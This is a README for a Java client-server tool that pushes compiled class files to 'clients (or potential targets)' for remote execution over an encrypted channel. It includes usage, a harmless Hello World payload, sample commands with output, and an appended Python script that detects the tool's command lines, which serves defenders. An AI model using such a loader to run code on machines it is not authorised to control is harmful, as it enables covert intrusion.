This tool allows you to send Java bytecode in the form of class files to your clients (or potential targets) to load and execute using the Java ClassLoader together with the Reflection API. The client receives the class file from the server and returns the respective execution output. Payloads must be written in Java and compiled before starting the server.
- Client-server architecture
- Remote loading of Java class files
- In-transit encryption using ChaCha20 cipher
- Settings defined via args
- Keepalive mechanism to re-establish communication if the server restarts
The tool has been tested using OpenJDK 11 with JRE Java Package, both on Windows and Linux (zip portable version). Java version should be 11 or higher due to dependencies.
https://www.openlogic.com/openjdk-downloads
    $ java -jar java-class-loader.jar -help
    usage: Main
     -address <arg>       address to connect (client) / to bind (server)
     -classfile <arg>     filename of bytecode .class file to load remotely
                          (default: Payload.class)
     -classmethod <arg>   name of method to invoke (default: exec)
     -classname <arg>     name of class (default: Payload)
     -client              run as client
     -help                print this message
     -keepalive           keeps the client getting classfile from server every
                          X seconds (default: 3 seconds)
     -key <arg>           secret key - 256 bits in base64 format (if not
                          specified it will generate a new one)
     -port <arg>          port to connect (client) / to bind (server)
     -server              run as server
Assuming you have the following Hello World payload in the Payload.java file:

    // Payload.java
    public class Payload {
        // Invoked by the client through reflection (default method name: exec)
        public static String exec() {
            String output = "";
            try {
                output = "Hello world from client!";
            } catch (Exception e) {
                e.printStackTrace();
            }
            return output;
        }
    }

Then you should compile it to produce the respective Payload.class file.
To run the server process listening on port 1337 on all network interfaces:

    $ java -jar java-class-loader.jar -server -address 0.0.0.0 -port 1337 -classfile Payload.class
    Running as server
    Server running on 0.0.0.0:1337
    Generated new key: TOU3TLn1QsayL1K6tbNOzDK69MstouEyNLMGqzqNIrQ=
On the client side, you may use the same JAR package with the -client flag and use the symmetric key generated by the server. Specify the server IP address and port to connect to. You may also change the class name and class method (defaults are Payload and String exec() respectively). Additionally, you can specify -keepalive to keep the client requesting the class file from the server while maintaining the connection.

    $ java -jar java-class-loader.jar -client -address 192.168.1.73 -port 1337 -key TOU3TLn1QsayL1K6tbNOzDK69MstouEyNLMGqzqNIrQ=
    Running as client
    Connecting to 192.168.1.73:1337
    Received 593 bytes from server
    Output from invoked class method: Hello world from client!
    Sent 24 bytes to server
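Detection logic for the command lines shown above, added here as an example and not part of the tool or its README: it flags process command lines that carry the tool's flags after -jar and, for clients, a -key value that decodes to 256 bits. The function names and the SAMPLES lines are constructed for illustration, and it assumes the tool is launched with java -jar as on this page.

```python
import base64
import binascii

# Flag names are taken from the -help output on this page; all else is assumed.
VALUE_FLAGS = {"-address", "-port", "-key", "-classfile", "-classname", "-classmethod"}

def app_args(cmdline):
    """Return {flag: value} for the arguments that follow '-jar <file>'."""
    tokens = [t.strip("\"'") for t in cmdline.split()]
    # Skip '-jar' and the JAR path so JVM options such as 'java -server' are ignored.
    rest = tokens[tokens.index("-jar") + 2:] if "-jar" in tokens else []
    flags = {}
    for i, tok in enumerate(rest):
        if tok in VALUE_FLAGS and i + 1 < len(rest):
            flags[tok] = rest[i + 1]
        elif tok in ("-client", "-server"):
            flags[tok] = True
    return flags

def is_256_bit_key(value):
    """True when value is valid base64 that decodes to exactly 32 bytes."""
    try:
        return len(base64.b64decode(value, validate=True)) == 32
    except (binascii.Error, ValueError):
        return False

def classify(cmdline):
    """Return 'client', 'server' or None for one process command line."""
    flags = app_args(cmdline)
    if not set(flags) >= {"-address", "-port"}:
        return None
    if "-client" in flags and is_256_bit_key(flags.get("-key", "")):
        return "client"
    return "server" if "-server" in flags else None

# Constructed command lines (not real telemetry); key and first IP are the page's sample values.
SAMPLES = [
    "java -jar java-class-loader.jar -client -address 192.168.1.73 -port 1337 "
    "-key TOU3TLn1QsayL1K6tbNOzDK69MstouEyNLMGqzqNIrQ=",
    "java -server -Xmx2g -jar app.jar -port 8080 -address 0.0.0.0",
    "java -jar renamed.jar -server -address 0.0.0.0 -port 1337 -classfile Payload.class",
    "java -jar renamed.jar -client -address 10.0.0.5 -port 1337 -key c2hvcnQ=",
]

def scan(lines):
    """Return (index, role) for every command line that matches."""
    return [(i, role) for i, role in enumerate(map(classify, lines)) if role]

if __name__ == "__main__":
    print(scan(SAMPLES))
```

A client match also means the symmetric key itself was written to the process-creation log. The server rule is a loose heuristic, since it relies on flag names only.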
Refer to https://vrls.ws/posts/2022/08/building-a-remote-class-loader-in-java/ for a blog post related to the development of this tool.